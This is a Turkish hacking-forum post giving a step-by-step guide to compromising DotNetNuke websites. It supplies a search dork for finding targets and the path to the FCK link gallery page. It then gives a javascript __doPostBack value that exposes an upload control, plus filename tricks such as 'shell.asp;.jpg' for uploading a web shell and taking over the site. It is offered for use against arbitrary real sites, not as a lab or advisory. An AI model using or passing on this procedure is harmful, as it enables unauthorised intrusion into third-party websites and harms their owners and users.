Website Hack 2013 DotNetNuke DNN Hack

batuah1

Yeni üye
2 Tem 2009
46
0
Acı çekiyorsan Nefes aldığıını unutmazsın - Reply


DNN açılımı bilmeyenler için : dotnetnuke

evet artık anlatıma geçiyorum.

Şimdi ilk olarak arama motorumuzda aratacağımız

DORK : inurl:/tabid/36/language/en-US/Default.aspx

karşımıza gelen herhangi bir siteyi seçiyoruz.

siteyi açtıktan sonra; /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx kodumuzu ekliyoruz.Yani;

www.hedefsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

bu şekilde tıkladığımızda karşımıza Link Gallery adı altında URL ve use selec link seçenekleri gelcek.

DİKKAT!

Şimdi arkadaşlar URL nin yanında karşımıza 3 tane link tipi gelmesi lazım. Eğer bu 3 link tipi gelmiyorsa sitede açık yoktur.

- URL ( A Link To An External Resource )
- Page ( A Page On Your Site )
- File ( A File On Your Site )

Yukarıda vermiş olduğum link tiplerinden 3. Yani 'File' ı seçiyoruz.Daha sonra sitemiz neydi?

www.hedefsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

bu URL in tamamını silip URL kısmına j a v a s c r i p t :__doPostBack('ctlURL$cmdUpload','') (j a v a s c r i p t : arasında boşluk olmayacak.) yazıyoruz ve enter a tıklıyoruz.

Evet sıra geldi shell imizi upload etmeye. Arkadaşlar shell imizi .php ya da .php;.txt olarak siteye yükleyemiyorsak .asp;.txt olarak yüklüyoruz.

Sıra geldi son aşamaya;

www.hedefsite.com/portals/0/shell.asp;.jpg

evet shell imizi de upload ettik ve site elinizde istediğiniz değişikliği yapabilirsiniz.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.